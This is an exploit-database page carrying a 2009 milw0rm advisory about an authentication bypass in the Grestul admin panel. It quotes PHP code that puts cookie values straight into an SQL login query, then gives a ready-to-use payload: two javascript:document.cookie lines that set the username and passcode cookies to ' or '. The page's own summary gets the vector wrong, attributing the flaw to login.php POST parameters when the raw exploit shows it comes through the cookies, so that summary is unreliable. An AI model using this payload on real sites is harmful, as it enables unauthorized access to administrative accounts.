header-logo
Suggest Exploit
vendor:
N/A
by:
x0r
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Grestul Sql Injection By Cookie (bypass)

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' and 'passcode' parameters of the 'login.php' script. A remote attacker can send a specially crafted HTTP request with malicious JavaScript code to the vulnerable script and execute arbitrary SQL commands in the application database. This can be exploited to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use a least-privilege model to limit the access of the application to the database.
Source

Exploit-DB raw data:

########################################
Grestul Sql Injection By Cookie ( bypass)
########################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.org
########################################

Let's Go!

\admin\login.php :

$username = SafeAddSlashes($_POST['username']);
$passcode = SafeAddSlashes(md5($_POST['passcode']));
$time = time();
$check = SafeAddSlashes($_POST['setcookie']);

$query = "SELECT user, pass FROM grestullogin WHERE user = '$username' AND
pass = '$passcode'";
$result = mysql_query($query, $db);
if(mysql_num_rows($result)) {
$_SESSION['loggedin'] = 1;
	if($check) {
	setcookie("grestul[username]", $username, $time + 3600);
	setcookie("grestul[passcode]", $passcode, $time + 3600);

Oh damn ! SafeAddSlashes...our ' or ' don't go! But...\admin\index.php

if(isset($_COOKIE['grestul'])) {

include 'inc/config.php';

$username = $_COOKIE['grestul']['username'];
$passcode = $_COOKIE['grestul']['passcode'];

$query = "SELECT user, pass FROM grestullogin WHERE user = '$username' AND
pass = '$passcode'";
$result = mysql_query($query, $db);

So....

Exploit:

[+]javascript:document.cookie = "grestul[username]=' or '; path=/";
[+]javascript:document.cookie = "grestul[passcode]=' or '; path=/";

And then \admin\index.php ^ ^ Auth Bypassed ^ ^

################################################

w00t Z0ne - InfoSec Forums
    [ w00tZ0ne.org ]

# milw0rm.com [2009-02-16]

Navigation

Suggest Exploit

Services By CQR